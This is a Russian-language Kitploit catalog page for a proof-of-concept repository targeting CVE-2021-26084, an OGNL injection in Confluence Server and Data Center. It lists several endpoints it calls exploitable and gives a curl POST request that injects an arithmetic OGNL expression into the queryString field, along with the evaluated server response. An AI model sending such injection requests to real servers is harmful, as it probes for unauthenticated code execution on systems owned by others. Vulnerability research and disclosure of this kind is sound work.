Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-26084_PoC — Эксплойт, подтверждающий концепцию, для CVE-2021-26084 — уязвимости внедрения OGNL в Confluence Server и Data Center, демонстрирующий неаутентифицированное удалённое выполнение кода. | Kitploit
Инструменты/GitHubGitHub/alt3kx/cve-2021-26084_poc
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubalt3kx/cve-2021-26084_poc

CVE-2021-26084_PoC

Эксплойт, подтверждающий концепцию, для CVE-2021-26084 — уязвимости внедрения OGNL в Confluence Server и Data Center, демонстрирующий неаутентифицированное удалённое выполнение кода.

Репозиторий
5316485 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-26084 (PoC) | OGNL-инъекция в Confluence Server Webwork

Уязвимость инъекции OGNL позволяет аутентифицированному пользователю, а в некоторых случаях и неаутентифицированному, выполнять произвольный код на экземпляре Confluence Server или Data Center.

poc

Моя борьба за поиск точек входа и инъекций XD

Схватка (1)Схватка (2)
2021_09_01_00_37_23_Oops_an_error_has_occurred_Confluence_Chromium
2021_09_01_00_40_42_Oops_an_error_has_occurred_Confluence_Chromium

Наконец-то эксплуатируемые точки входа Confluence

root@kitploit:~
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action

Моя первая ручная проверка: Примечание: неаутентифицированный пользователь

root@kitploit:~
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'

Server Response: 

HTTP/1.1 200 
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>

[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />

Ссылки:

https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

Отличный разбор опубликован здесь:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

Несколько очень полезных советов от:
@wvuuuuuuuuuuuuu
@iamnoooob

Автор

Alex Hernandez, также известный как (@_alt3kx_)

Скачать инструмент